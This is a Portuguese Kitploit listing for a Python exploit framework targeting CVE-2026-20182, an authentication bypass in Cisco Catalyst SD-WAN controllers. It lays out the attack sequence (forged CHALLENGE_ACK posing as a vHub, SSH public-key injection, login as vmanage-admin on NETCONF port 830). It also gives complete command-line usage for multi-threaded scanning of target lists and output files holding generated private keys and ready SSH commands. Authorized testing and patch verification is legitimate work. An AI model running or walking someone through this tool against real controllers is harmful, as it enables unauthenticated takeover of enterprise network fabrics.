Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-20182 — Bypass de Autenticação de Peering do Cisco Catalyst SD-WAN | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-20182
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Bypass de Autenticação de Peering do Cisco Catalyst SD-WAN

Ver Repositório
12há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-20182

Bypass de Autenticação de Peering do Cisco Catalyst SD-WAN

CVE-2026-20182 — Bypass de Autenticação de Peering do Cisco Catalyst SD-WAN

Ferramenta de avaliação para testes autorizados do bypass de autenticação de peering do Cisco Catalyst SD-WAN Controller / Manager (CVE-2026-20182).

CVECVE-2026-20182
SeveridadeCrítica (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProdutoCisco Catalyst SD-WAN Controller (anteriormente vSmart) · Cisco Catalyst SD-WAN Manager (anteriormente vManage)
ProblemaMecanismo de autenticação de peering não aplicado corretamente
ScriptCVE-2026-20182.py

Resumo da Vulnerabilidade

Aviso de maio de 2026: Uma falha no handshake de conexão de controle / autenticação de peering permite que um atacante remoto não autenticado bypass a autenticação e obtenha acesso interno de alto privilégio em sistemas afetados.

Um atacante envia requisições maliciosas para o sistema afetado. Em caso de sucesso, o atacante pode autenticar como uma conta interna, de alto privilégio, não-root e alcançar NETCONF, permitindo a manipulação da configuração da malha SD-WAN.

Recomendação: Aplique as correções de segurança da Cisco conforme orientação oficial do fornecedor. Restrinja a exposição do plano de gerenciamento, monitore conexões do plano de controle e audite controladores SD-WAN para alterações não autorizadas na configuração.


Contato

Telegram: @KNxploited


Pré-visualização do Console

Console de operações do CVE-2026-20182


Ferramenta: CVE-2026-20182.py

Framework de exploração em Python 3 para CVE-2026-20182 contra o vdaemon do Cisco SD-WAN (UDP/DTLS 12346).

O que faz (passo a passo)

Fallback de malha: Em TEAR_DOWN ou incompatibilidade de parâmetros, tenta presets alternativos de domínio/site (1,100), (1,1), (0,0) a menos que --no-fallback.


Níveis de Resultado (leia com atenção)

Importante

  • Modo check → nível 03 no máximo (sonda de bypass). Não é prova de exploração completa.
  • Modo full → objetivo é nível 01 (ssh_verified).
  • https://host na lista → apenas dica web TCP (80/443). Não é UDP DTLS na 443.

Requisitos

root@kitploit:~
pip install -r requirements.txt

OpenSSL (sistema)

Windows

  1. Instale Win64 OpenSSL 3.x ou equivalente
  2. Adicione bin\ ao PATH, ou defina:
root@kitploit:~
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

root@kitploit:~
# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

A ferramenta sai na inicialização se o OpenSSL não puder ser carregado.


Início Rápido

Menu interativo (padrão)

root@kitploit:~
python CVE-2026-20182.py
  • Configure opções 1–11, depois 0 = INICIAR VARREDURA
  • Modo de execução padrão: check (sonda de bypass segura)

Não interativo (automação)

root@kitploit:~
python CVE-2026-20182.py -y

Modos de Execução

CHECK — apenas sonda de bypass

root@kitploit:~
python CVE-2026-20182.py -y --mode check

FULL — injetar chave + verificar SSH (apenas alvos autorizados)

root@kitploit:~
python CVE-2026-20182.py -y --mode full

Referência CLI (cada flag + exemplo)

Alvos & workers

-f / --file — lista de alvos (padrão: targets.txt)

root@kitploit:~
python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — threads workers (1–200, padrão 12)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID padrão quando não está na lista (padrão: 1)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID padrão quando não está na lista (padrão: 100)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

Modo & automação

--mode — check | full

root@kitploit:~
python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — pular menu interativo; usar apenas valores da CLI

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

Verificação SSH

--no-ssh-verify — pular teste SSH pós-injeção (não recomendado no modo full)

root@kitploit:~
python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — também tentar TCP 22 após 830

root@kitploit:~
python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / malha

--no-try-list-udp — apenas UDP 12346; ignorar :port da lista

root@kitploit:~
python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — laboratório: portas UDP extras em cada host

root@kitploit:~
python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — desabilitar re-tentativa de domínio/site em TEAR_DOWN

root@kitploit:~
python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

Registro de log

-v / --verbose — registrar cada mensagem TX/RX do protocolo

root@kitploit:~
python CVE-2026-20182.py -y -v -f targets.txt --mode check

Menu Interativo (quando -y é omitido)


Formato do targets.txt

Um alvo por linha. Linhas começando com # são ignoradas.

Arquivo de exemplo

root@kitploit:~
# Controladores de laboratório — apenas autorizados
10.10.10.1
10.10.10.2:12346:1:100
https://sdwan-controller.example.com
10.10.10.4:12346:1:1

Não suportado: IPv6 (apenas IPv4 / hostname).


Arquivos de Saída

Exemplo de comando SSH (nível 01)

root@kitploit:~
ssh -i "sdwan_keys/sdwan_10_10_10_1_12346_d1_s100.pem" [email protected] -p 830 -N

Fluxos de Trabalho Recomendados

1) Triagem de muitos hosts (rápido)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 24

Revise cisco_sdwan_03_bypass_only.jsonl e estatísticas ao vivo Apenas Bypass.

2) Confirmar exploração em hosts pré-selecionados

root@kitploit:~
python CVE-2026-20182.py -y -f confirmed_hosts.txt --mode full -t 8

Revise cisco_sdwan_01_confirmed_ssh.jsonl — único arquivo com ssh_verified: true.

3) Depurar host único (verboso)

root@kitploit:~
python CVE-2026-20182.py -y -f single.txt --mode full -t 1 -v --no-fallback

Telemetria ao Vivo (durante a varredura)


Notas Operacionais

  • Modo padrão é check — não escreve chaves nem prova SSH por si só.
  • Sucesso real = ssh_verified=true no modo full apenas.
  • Corrigido / malha errada → frequentemente TEAR_DOWN após CHALLENGE_ACK; ative fallback de malha ou corrija domínio/site na lista.
  • Firewall deve permitir UDP/12346 (e quaisquer portas UDP extras da lista) do seu scanner para o controlador.
  • Não faça commit de sdwan_keys/ ou resultados de varredura em repositórios públicos.

Aviso Legal

Este software é apenas para pesquisa de segurança autorizada, avaliação defensiva e educação.

Você deve ter permissão explícita por escrito para testar qualquer sistema que não possua ou opere. Acesso não autorizado a sistemas de computador é ilegal. O autor não é responsável por uso indevido, danos ou consequências legais decorrentes do uso desta ferramenta.

Use apenas em sistemas e redes onde você está explicitamente autorizado a realizar testes de segurança.


Por: Nxploited ( Khaled Alenazi )

Baixar ferramenta
ItemDetalhe
Vetor de ataqueRede
Privilégios necessáriosNenhum
Interação do usuárioNenhuma
EscopoAlterado
ImpactoConfidencialidade, integridade e disponibilidade — Alto
PassoFaseDescrição
1Carregar alvosAnalisa targets.txt, mescla duplicatas por (host, domain_id, site_id)
2Preparação OpenSSLCarrega bibliotecas compartilhadas OpenSSL 3.x/4.x para DTLS personalizado
3Conexão DTLSConecta à porta UDP do alvo (sempre 12346 primeiro, depois portas opcionais da lista)
4CHALLENGERecebe CHALLENGE (0x08) do servidor
5CHALLENGE_ACKEnvia CHALLENGE_ACK malicioso como vHub (type 2) — bypass de autenticação
6HelloCompleta a troca Hello — confirma o caminho de bypass
7aModo CHECKPara aqui — registra bypass / Hello OK apenas (sem chaves, sem SSH)
7bModo FULLInjeta chave pública SSH via VMANAGE_TO_PEER
8ACK de injeçãoAguarda REGISTER_TO_VMANAGE (0x0D) como confirmação do protocolo
9Verificação SSHTesta login como vmanage-admin na porta TCP 830 (NETCONF), opcionalmente 22
10SaídaClassifica resultados em arquivos de nível + lista de comandos legível
NívelArquivoSignificado
01 — SSH Confirmadocisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — único nível tratado como prova de comprometimento total
02 — Apenas ACK de Injeçãocisco_sdwan_02_inject_ack_only.jsonlProtocolo aceitou injeção de chave; falha no login SSH
03 — Apenas Bypasscisco_sdwan_03_bypass_only.jsonlHello/bypass OK; injeção não confirmada
RequisitoObservações
Python3.9+
pipcryptography, rich
OpenSSLBibliotecas compartilhadas 3.x ou 4.x (libssl + libcrypto) — obrigatório
ModoFlagInjeção SSHVerificação SSHUse quando
CHECK--mode check (padrão)NãoNãoTriagem em massa, detecção de bypass
FULL--mode fullSimSim (a menos que --no-ssh-verify)Prova de comprometimento
#Opção
1Arquivo de alvos
2Threads workers
3DOMAIN_ID padrão
4SITE_ID padrão
5Modo: check / full
6Re-tentativa automática de malha em TEAR_DOWN
7Log verboso do protocolo
8Verificação SSH após injeção
9Verificar também SSH :22
10Tentar portas UDP explícitas da lista
11Portas UDP extras (laboratório)
12Mostrar ajuda de formato da lista
0▶ INICIAR VARREDURA
FormatoExemploComportamento
IP / hostname10.0.0.1UDP 12346 + domínio/site padrão
IP + porta UDP10.0.0.2:12346Também tentar porta UDP da lista
IP + porta + domínio + site10.0.0.3:12346:1:100Tupla completa de malha
URL HTTPShttps://10.0.0.4Host + apenas dica TCP 443 (não UDP/443)
URL HTTPhttp://10.0.0.5Apenas dica TCP 80
URL UDPudp://10.0.0.6:12346UDP explícito
Separado por tab/vírgula10.0.0.7 12346 1 100Mesmo que formulário de quatro campos
Chave=valor10.0.0.8;port=12346;domain=1;site=100Sintaxe KV com ponto e vírgula
ArquivoConteúdo
cisco_sdwan_results.jsonlResultado JSON bruto por tentativa
cisco_sdwan_success.txtLinhas SSH confirmadas (separadas por tab)
cisco_sdwan_01_confirmed_ssh.jsonlNível 01 — SSH verificado
cisco_sdwan_02_inject_ack_only.jsonlNível 02 — ACK de injeção, SSH falhou
cisco_sdwan_03_bypass_only.jsonlNível 03 — apenas bypass / Hello
cisco_sdwan_commands.txtComandos SSH legíveis
cisco_sdwan_findings.jsonResumo da sessão + contagens
sdwan_keys/Chaves privadas geradas (modo full)
ContadorSignificado
ProgressoAlvos concluídos / total
SSH verificadoContagem do nível 01
ACK de injeçãoContagem do nível 02
Apenas bypassContagem do nível 03
FalhouErros / sem bypass